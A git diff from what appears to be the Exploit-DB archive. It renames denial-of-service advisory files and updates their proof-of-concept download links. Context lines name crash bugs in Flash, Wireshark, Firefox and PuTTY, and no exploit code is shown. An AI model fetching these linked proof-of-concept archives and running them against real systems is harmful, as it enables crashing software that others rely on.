+++ b/exploits/multiple/dos/39401.txt @@ -142,4 +142,4 @@ The crash was reported at https://code.google.com/p/chromium/issues/detail?id=55 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39401.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39401.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39426.txt b/exploits/multiple/dos/39426.txt similarity index 87% rename from platforms/multiple/dos/39426.txt rename to exploits/multiple/dos/39426.txt index d95ee5e59..322cd5fc0 100644 --- a/platforms/multiple/dos/39426.txt +++ b/exploits/multiple/dos/39426.txt @@ -4,4 +4,4 @@ The attached mp4 file causes stack corruption in Flash. To run the test, load Lo Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39426-1.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39426-1.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39460.txt b/exploits/multiple/dos/39460.txt similarity index 88% rename from platforms/multiple/dos/39460.txt rename to exploits/multiple/dos/39460.txt index 6e72db7aa..f1566673b 100644 --- a/platforms/multiple/dos/39460.txt +++ b/exploits/multiple/dos/39460.txt @@ -4,4 +4,4 @@ The attached file can cause an out-of-bounds read of an image. While the bits of Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39460.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39460.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39461.txt b/exploits/multiple/dos/39461.txt similarity index 96% rename from platforms/multiple/dos/39461.txt rename to exploits/multiple/dos/39461.txt index 3c73e1f94..60e4ef0c3 100644 --- a/platforms/multiple/dos/39461.txt +++ b/exploits/multiple/dos/39461.txt @@ -21,4 +21,4 @@ Then in the swf, a backing object of a different type with ID 0xfff9 is created, Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39461.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39461.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39462.txt b/exploits/multiple/dos/39462.txt similarity index 95% rename from platforms/multiple/dos/39462.txt rename to exploits/multiple/dos/39462.txt index f73ad3968..45836f889 100644 --- a/platforms/multiple/dos/39462.txt +++ b/exploits/multiple/dos/39462.txt @@ -29,4 +29,4 @@ A full PoC and swf are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39462.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39462.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39463.txt b/exploits/multiple/dos/39463.txt similarity index 92% rename from platforms/multiple/dos/39463.txt rename to exploits/multiple/dos/39463.txt index 033623dfe..4ba056c74 100644 --- a/platforms/multiple/dos/39463.txt +++ b/exploits/multiple/dos/39463.txt @@ -24,4 +24,4 @@ A sample swf and fla are attached. This issue was reproduced in Chrome on 64-bit Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39463.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39463.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39464.txt b/exploits/multiple/dos/39464.txt similarity index 89% rename from platforms/multiple/dos/39464.txt rename to exploits/multiple/dos/39464.txt index 9513b993f..98826c2b3 100644 --- a/platforms/multiple/dos/39464.txt +++ b/exploits/multiple/dos/39464.txt @@ -4,4 +4,4 @@ There is an out-of-bounds read in H264 parsing, a fuzzed file is attached. To lo Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39464.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39464.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39465.txt b/exploits/multiple/dos/39465.txt similarity index 87% rename from platforms/multiple/dos/39465.txt rename to exploits/multiple/dos/39465.txt index 049813d0e..f79dbe22b 100644 --- a/platforms/multiple/dos/39465.txt +++ b/exploits/multiple/dos/39465.txt @@ -4,4 +4,4 @@ The attached file causes a crash due to a heap overflow, probably due to an issu Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39465.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39465.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39466.txt b/exploits/multiple/dos/39466.txt similarity index 88% rename from platforms/multiple/dos/39466.txt rename to exploits/multiple/dos/39466.txt index e70190a42..072bb8e71 100644 --- a/platforms/multiple/dos/39466.txt +++ b/exploits/multiple/dos/39466.txt @@ -4,4 +4,4 @@ The attached flv file causes stack corruption when loaded into Flash. To use the Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39466.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39466.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39467.txt b/exploits/multiple/dos/39467.txt similarity index 86% rename from platforms/multiple/dos/39467.txt rename to exploits/multiple/dos/39467.txt index 7fa510160..69cf53636 100644 --- a/platforms/multiple/dos/39467.txt +++ b/exploits/multiple/dos/39467.txt @@ -4,4 +4,4 @@ The attached fuzz test case causes a crash due to a heap overflow in BitmapData. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39467.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39467.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39476.txt b/exploits/multiple/dos/39476.txt similarity index 94% rename from platforms/multiple/dos/39476.txt rename to exploits/multiple/dos/39476.txt index f6af426d2..1fc9e3067 100644 --- a/platforms/multiple/dos/39476.txt +++ b/exploits/multiple/dos/39476.txt @@ -12,4 +12,4 @@ When the button is created, the font will be type confused with a button. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39476.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39476.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39482.txt b/exploits/multiple/dos/39482.txt similarity index 97% rename from platforms/multiple/dos/39482.txt rename to exploits/multiple/dos/39482.txt index 82b443983..6dc324e63 100644 --- a/platforms/multiple/dos/39482.txt +++ b/exploits/multiple/dos/39482.txt @@ -94,4 +94,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39482.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39482.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39483.txt b/exploits/multiple/dos/39483.txt similarity index 97% rename from platforms/multiple/dos/39483.txt rename to exploits/multiple/dos/39483.txt index f2949e287..8c478e57d 100644 --- a/platforms/multiple/dos/39483.txt +++ b/exploits/multiple/dos/39483.txt @@ -70,4 +70,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39483.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39483.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39484.txt b/exploits/multiple/dos/39484.txt similarity index 98% rename from platforms/multiple/dos/39484.txt rename to exploits/multiple/dos/39484.txt index 730be408d..adf9aba13 100644 --- a/platforms/multiple/dos/39484.txt +++ b/exploits/multiple/dos/39484.txt @@ -137,4 +137,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39484.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39484.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39487.py b/exploits/multiple/dos/39487.py similarity index 100% rename from platforms/multiple/dos/39487.py rename to exploits/multiple/dos/39487.py diff --git a/platforms/multiple/dos/39490.txt b/exploits/multiple/dos/39490.txt similarity index 97% rename from platforms/multiple/dos/39490.txt rename to exploits/multiple/dos/39490.txt index 59b2ad9b1..14c27ff8f 100644 --- a/platforms/multiple/dos/39490.txt +++ b/exploits/multiple/dos/39490.txt @@ -62,4 +62,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39490.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39490.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39503.txt b/exploits/multiple/dos/39503.txt similarity index 97% rename from platforms/multiple/dos/39503.txt rename to exploits/multiple/dos/39503.txt index 7890bf8cd..a3d7a20b1 100644 --- a/platforms/multiple/dos/39503.txt +++ b/exploits/multiple/dos/39503.txt @@ -101,4 +101,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39503.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39503.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39529.txt b/exploits/multiple/dos/39529.txt similarity index 97% rename from platforms/multiple/dos/39529.txt rename to exploits/multiple/dos/39529.txt index 29c5a0111..987827b98 100644 --- a/platforms/multiple/dos/39529.txt +++ b/exploits/multiple/dos/39529.txt @@ -67,4 +67,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39529.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39529.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39550.py b/exploits/multiple/dos/39550.py similarity index 100% rename from platforms/multiple/dos/39550.py rename to exploits/multiple/dos/39550.py diff --git a/platforms/multiple/dos/39551.txt b/exploits/multiple/dos/39551.txt similarity index 95% rename from platforms/multiple/dos/39551.txt rename to exploits/multiple/dos/39551.txt index 9f055622b..63784674f 100644 --- a/platforms/multiple/dos/39551.txt +++ b/exploits/multiple/dos/39551.txt @@ -31,4 +31,4 @@ The vulnerable code is located in pscp.c [4] line 1498 (HEAD) and is based on an Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39551.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39551.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39604.txt b/exploits/multiple/dos/39604.txt similarity index 97% rename from platforms/multiple/dos/39604.txt rename to exploits/multiple/dos/39604.txt index 21c84d9fd..853fe1a53 100644 --- a/platforms/multiple/dos/39604.txt +++ b/exploits/multiple/dos/39604.txt @@ -94,4 +94,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39604.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39604.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39633.txt b/exploits/multiple/dos/39633.txt similarity index 95% rename from platforms/multiple/dos/39633.txt rename to exploits/multiple/dos/39633.txt index b9c3b0b3f..a76d1c76c 100644 --- a/platforms/multiple/dos/39633.txt +++ b/exploits/multiple/dos/39633.txt @@ -63,6 +63,6 @@ By providing a malformed FPX file, an attacker is able to create controlled memo Proof of Concept: http://protekresearchlab.com/exploits/COSIG-2016-14.fpx -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39633.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39633.zip ############################################################################### \ No newline at end of file diff --git a/platforms/multiple/dos/39634.txt b/exploits/multiple/dos/39634.txt similarity index 95% rename from platforms/multiple/dos/39634.txt rename to exploits/multiple/dos/39634.txt index 9df408077..2709694bd 100644 --- a/platforms/multiple/dos/39634.txt +++ b/exploits/multiple/dos/39634.txt @@ -62,6 +62,6 @@ By providing a malformed FPX file, an attacker is able to create controlled memo =========== http://protekresearchlab.com/exploits/COSIG-2016-15.fpx -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39634.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39634.zip ############################################################################### \ No newline at end of file diff --git a/platforms/multiple/dos/39635.txt b/exploits/multiple/dos/39635.txt similarity index 95% rename from platforms/multiple/dos/39635.txt rename to exploits/multiple/dos/39635.txt index 584b0c197..b9c9b7569 100644 --- a/platforms/multiple/dos/39635.txt +++ b/exploits/multiple/dos/39635.txt @@ -62,6 +62,6 @@ By providing a malformed PSD file, an attacker is able to create an out of bound =========== http://protekresearchlab.com/exploits/COSIG-2016-16.psd -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39635.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39635.zip ############################################################################### \ No newline at end of file diff --git a/platforms/multiple/dos/39644.txt b/exploits/multiple/dos/39644.txt similarity index 97% rename from platforms/multiple/dos/39644.txt rename to exploits/multiple/dos/39644.txt index e425d69b6..26557f4ea 100644 --- a/platforms/multiple/dos/39644.txt +++ b/exploits/multiple/dos/39644.txt @@ -94,4 +94,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39644.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39644.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39649.txt b/exploits/multiple/dos/39649.txt similarity index 93% rename from platforms/multiple/dos/39649.txt rename to exploits/multiple/dos/39649.txt index 42111d817..09e33e16f 100644 --- a/platforms/multiple/dos/39649.txt +++ b/exploits/multiple/dos/39649.txt @@ -31,4 +31,4 @@ A sample script and SWF are attached. Note that file.txt needs to be in the same Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39649.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39649.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39650.txt b/exploits/multiple/dos/39650.txt similarity index 92% rename from platforms/multiple/dos/39650.txt rename to exploits/multiple/dos/39650.txt index f20a8a7fc..6b9764e7e 100644 --- a/platforms/multiple/dos/39650.txt +++ b/exploits/multiple/dos/39650.txt @@ -25,4 +25,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39650.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39650.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39652.txt b/exploits/multiple/dos/39652.txt similarity index 90% rename from platforms/multiple/dos/39652.txt rename to exploits/multiple/dos/39652.txt index 26c142b72..3e43245fb 100644 --- a/platforms/multiple/dos/39652.txt +++ b/exploits/multiple/dos/39652.txt @@ -21,4 +21,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39652.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39652.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39657.py b/exploits/multiple/dos/39657.py similarity index 100% rename from platforms/multiple/dos/39657.py rename to exploits/multiple/dos/39657.py diff --git a/platforms/multiple/dos/39748.txt b/exploits/multiple/dos/39748.txt similarity index 97% rename from platforms/multiple/dos/39748.txt rename to exploits/multiple/dos/39748.txt index d512fa584..78cc26e0a 100644 --- a/platforms/multiple/dos/39748.txt +++ b/exploits/multiple/dos/39748.txt @@ -111,4 +111,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39748.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39748.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39749.txt b/exploits/multiple/dos/39749.txt similarity index 98% rename from platforms/multiple/dos/39749.txt rename to exploits/multiple/dos/39749.txt index a673464d3..9a53a822b 100644 --- a/platforms/multiple/dos/39749.txt +++ b/exploits/multiple/dos/39749.txt @@ -106,4 +106,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39749.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39749.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39750.txt b/exploits/multiple/dos/39750.txt similarity index 98% rename from platforms/multiple/dos/39750.txt rename to exploits/multiple/dos/39750.txt index 94c88e4e5..eac3ba430 100644 --- a/platforms/multiple/dos/39750.txt +++ b/exploits/multiple/dos/39750.txt @@ -172,4 +172,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39750.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39750.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39767.txt b/exploits/multiple/dos/39767.txt similarity index 100% rename from platforms/multiple/dos/39767.txt rename to exploits/multiple/dos/39767.txt diff --git a/platforms/multiple/dos/39768.txt b/exploits/multiple/dos/39768.txt similarity index 96% rename from platforms/multiple/dos/39768.txt rename to exploits/multiple/dos/39768.txt index 633b03adc..fc6e96f57 100644 --- a/platforms/multiple/dos/39768.txt +++ b/exploits/multiple/dos/39768.txt @@ -2,7 +2,7 @@ Source: http://web-in-security.blogspot.ca/2016/05/curious-padding-oracle-in-ope TLS-Attacker: https://github.com/RUB-NDS/TLS-Attacker -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39768.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39768.zip You can use TLS-Attacker to build a proof of concept and test your implementation. You just start TLS-Attacker as follows: diff --git a/platforms/multiple/dos/39799.txt b/exploits/multiple/dos/39799.txt similarity index 95% rename from platforms/multiple/dos/39799.txt rename to exploits/multiple/dos/39799.txt index baef5be9e..e74501842 100644 --- a/platforms/multiple/dos/39799.txt +++ b/exploits/multiple/dos/39799.txt @@ -44,6 +44,6 @@ Technical details: POC: ========== https://plmsecurity.net/sites/plmsecurity.net/files/APSB16-14_PoC.pdf -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39799.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39799.zip ######################################################################################## \ No newline at end of file diff --git a/platforms/multiple/dos/39812.txt b/exploits/multiple/dos/39812.txt similarity index 97% rename from platforms/multiple/dos/39812.txt rename to exploits/multiple/dos/39812.txt index 71fbe6dfb..eddb42611 100644 --- a/platforms/multiple/dos/39812.txt +++ b/exploits/multiple/dos/39812.txt @@ -76,4 +76,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39812.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39812.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39824.txt b/exploits/multiple/dos/39824.txt similarity index 89% rename from platforms/multiple/dos/39824.txt rename to exploits/multiple/dos/39824.txt index fde71dc6e..7d0400c66 100644 --- a/platforms/multiple/dos/39824.txt +++ b/exploits/multiple/dos/39824.txt @@ -8,4 +8,4 @@ LoadImage.swf?img=8 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39824.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39824.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39825.txt b/exploits/multiple/dos/39825.txt similarity index 89% rename from platforms/multiple/dos/39825.txt rename to exploits/multiple/dos/39825.txt index 07fc28d32..265805110 100644 --- a/platforms/multiple/dos/39825.txt +++ b/exploits/multiple/dos/39825.txt @@ -8,4 +8,4 @@ http://127.0.0.1/LoadImage.swf?img=70 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39825.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39825.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39826.txt b/exploits/multiple/dos/39826.txt similarity index 88% rename from platforms/multiple/dos/39826.txt rename to exploits/multiple/dos/39826.txt index 8957740b7..50f63901d 100644 --- a/platforms/multiple/dos/39826.txt +++ b/exploits/multiple/dos/39826.txt @@ -8,4 +8,4 @@ LoadImage.swf?img=70 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39826.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39826.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39827.txt b/exploits/multiple/dos/39827.txt similarity index 88% rename from platforms/multiple/dos/39827.txt rename to exploits/multiple/dos/39827.txt index 1d6d77220..56cc9d578 100644 --- a/platforms/multiple/dos/39827.txt +++ b/exploits/multiple/dos/39827.txt @@ -6,4 +6,4 @@ LoadImage.swf?img=4 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39827.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39827.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39828.txt b/exploits/multiple/dos/39828.txt similarity index 87% rename from platforms/multiple/dos/39828.txt rename to exploits/multiple/dos/39828.txt index 83293d209..ac2b3b2ff 100644 --- a/platforms/multiple/dos/39828.txt +++ b/exploits/multiple/dos/39828.txt @@ -4,4 +4,4 @@ The attached mp4 file causes stack corruption in flash. To load, put LoadMP42.sw Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39828.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39828.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39829.txt b/exploits/multiple/dos/39829.txt similarity index 93% rename from platforms/multiple/dos/39829.txt rename to exploits/multiple/dos/39829.txt index e841ae756..a0cc37c69 100644 --- a/platforms/multiple/dos/39829.txt +++ b/exploits/multiple/dos/39829.txt @@ -30,4 +30,4 @@ function myfunc(){ Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39829.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39829.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39830.txt b/exploits/multiple/dos/39830.txt similarity index 90% rename from platforms/multiple/dos/39830.txt rename to exploits/multiple/dos/39830.txt index cf50e2f45..66cedf85d 100644 --- a/platforms/multiple/dos/39830.txt +++ b/exploits/multiple/dos/39830.txt @@ -18,4 +18,4 @@ A sample fla and swf are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39830.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39830.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39831.txt b/exploits/multiple/dos/39831.txt similarity index 90% rename from platforms/multiple/dos/39831.txt rename to exploits/multiple/dos/39831.txt index 20f6e8384..83eeb8993 100644 --- a/platforms/multiple/dos/39831.txt +++ b/exploits/multiple/dos/39831.txt @@ -17,4 +17,4 @@ A swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39831.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39831.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39834.txt b/exploits/multiple/dos/39834.txt similarity index 97% rename from platforms/multiple/dos/39834.txt rename to exploits/multiple/dos/39834.txt index e83e92116..246fe8017 100644 --- a/platforms/multiple/dos/39834.txt +++ b/exploits/multiple/dos/39834.txt @@ -84,4 +84,4 @@ The bug has been reproduced on a fully patched Windows 7 64-bit with a 32-bit PO Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39834.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39834.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39835.txt b/exploits/multiple/dos/39835.txt similarity index 97% rename from platforms/multiple/dos/39835.txt rename to exploits/multiple/dos/39835.txt index ee2cd8270..96782b431 100644 --- a/platforms/multiple/dos/39835.txt +++ b/exploits/multiple/dos/39835.txt @@ -115,4 +115,4 @@ Source code is included. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39835.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39835.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39859.txt b/exploits/multiple/dos/39859.txt similarity index 97% rename from platforms/multiple/dos/39859.txt rename to exploits/multiple/dos/39859.txt index adc0d9e76..162d3e70d 100644 --- a/platforms/multiple/dos/39859.txt +++ b/exploits/multiple/dos/39859.txt @@ -128,4 +128,4 @@ The bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1251869. At Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39859.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39859.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39860.txt b/exploits/multiple/dos/39860.txt similarity index 98% rename from platforms/multiple/dos/39860.txt rename to exploits/multiple/dos/39860.txt index 8cd2e75e8..7d932ef7b 100644 --- a/platforms/multiple/dos/39860.txt +++ b/exploits/multiple/dos/39860.txt @@ -145,4 +145,4 @@ The bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1252406. At Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39860.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39860.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39861.txt b/exploits/multiple/dos/39861.txt similarity index 97% rename from platforms/multiple/dos/39861.txt rename to exploits/multiple/dos/39861.txt index 6d13fc21e..a375dbf74 100644 --- a/platforms/multiple/dos/39861.txt +++ b/exploits/multiple/dos/39861.txt @@ -72,4 +72,4 @@ The bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1252411. At Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39861.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39861.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39862.txt b/exploits/multiple/dos/39862.txt similarity index 97% rename from platforms/multiple/dos/39862.txt rename to exploits/multiple/dos/39862.txt index 74bc55c24..c570b61ba 100644 --- a/platforms/multiple/dos/39862.txt +++ b/exploits/multiple/dos/39862.txt @@ -74,4 +74,4 @@ The bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1254487. At Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39862.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39862.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39863.txt b/exploits/multiple/dos/39863.txt similarity index 97% rename from platforms/multiple/dos/39863.txt rename to exploits/multiple/dos/39863.txt index e621e93ce..461005a6f 100644 --- a/platforms/multiple/dos/39863.txt +++ b/exploits/multiple/dos/39863.txt @@ -134,4 +134,4 @@ The bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1254497. At Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39863.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39863.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39867.py b/exploits/multiple/dos/39867.py similarity index 100% rename from platforms/multiple/dos/39867.py rename to exploits/multiple/dos/39867.py diff --git a/platforms/multiple/dos/39877.txt b/exploits/multiple/dos/39877.txt similarity index 95% rename from platforms/multiple/dos/39877.txt rename to exploits/multiple/dos/39877.txt index 0fa11bf8a..e31cc6623 100644 --- a/platforms/multiple/dos/39877.txt +++ b/exploits/multiple/dos/39877.txt @@ -20,4 +20,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39877.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39877.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39882.txt b/exploits/multiple/dos/39882.txt similarity index 100% rename from platforms/multiple/dos/39882.txt rename to exploits/multiple/dos/39882.txt diff --git a/platforms/multiple/dos/39906.txt b/exploits/multiple/dos/39906.txt similarity index 89% rename from platforms/multiple/dos/39906.txt rename to exploits/multiple/dos/39906.txt index 787685cb1..bc78ffd9a 100644 --- a/platforms/multiple/dos/39906.txt +++ b/exploits/multiple/dos/39906.txt @@ -6,4 +6,4 @@ Let Word recover it, its essential, and then you can trigger the bug 